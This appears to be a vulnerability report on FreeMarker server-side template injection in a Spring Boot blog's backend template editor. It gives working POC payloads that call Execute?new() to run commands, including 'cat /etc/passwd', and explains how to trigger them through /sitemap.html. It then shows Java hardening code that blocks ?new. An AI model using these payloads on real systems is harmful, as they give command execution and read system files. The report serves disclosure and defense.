1. The project references the spring-boot-starter-freemarker component in the blog-core/pom.xml file.
2. The vulnerable point is in the backend, under website management, template management. Find the TM_SITEMAP_HTML file and write the POC into it:
<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
<#assign value="freemarker.template.utility.Execute"?new()>${value("cat /etc/passwd")}
3. After saving, visit the homepage, find the site map link lower on the page, and click it to trigger the vulnerability. You can also access /sitemap.html directly to trigger it.
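A mitigation sketch for the `?new` instantiation used in the POC, added here as an example and not taken from the project's code: FreeMarker's `TemplateClassResolver` decides which classes `?new` may create, and a restrictive resolver makes the edited template fail at render time. The class name `HardenedTemplateRenderer`, the `echo test` argument and the assumption that FreeMarker 2.3.23 or later is on the classpath are illustrative.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;
import freemarker.template.TemplateExceptionHandler;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;

// Hypothetical class name; shows one way to render admin-editable templates.
public class HardenedTemplateRenderer {

    /** Configuration intended for templates that can be edited in the backend. */
    static Configuration hardenedConfiguration() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_23);
        // Refuse every class name given to ?new, so Execute cannot be instantiated.
        // SAFER_RESOLVER is the less strict option: it blocks Execute,
        // ObjectConstructor and JythonRuntime only.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        // Surface the failure to the caller instead of writing it into the page.
        cfg.setTemplateExceptionHandler(TemplateExceptionHandler.RETHROW_HANDLER);
        cfg.setLogTemplateExceptions(false);
        return cfg;
    }

    /** Returns the rendered text, or null when FreeMarker rejects the template at runtime. */
    static String render(Configuration cfg, String name, String source) throws IOException {
        Template template = new Template(name, new StringReader(source), cfg);
        StringWriter out = new StringWriter();
        try {
            template.process(Collections.emptyMap(), out);
            return out.toString();
        } catch (TemplateException e) {
            System.err.println("Rejected template " + name + ": " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws IOException {
        Configuration cfg = hardenedConfiguration();
        // Constructed sample with the same shape as the POC and a harmless argument.
        // The resolver rejects it before any Execute object is created.
        String edited = "<#assign value=\"freemarker.template.utility.Execute\"?new()>"
                + "${value(\"echo test\")}";
        System.out.println("edited template -> " + render(cfg, "TM_SITEMAP_HTML", edited));
        System.out.println("plain template  -> " + render(cfg, "TM_SITEMAP_HTML", "<h1>Sitemap</h1>"));
    }
}
```

The resolver only covers `?new`; who is allowed to edit templates in the backend still needs its own access control.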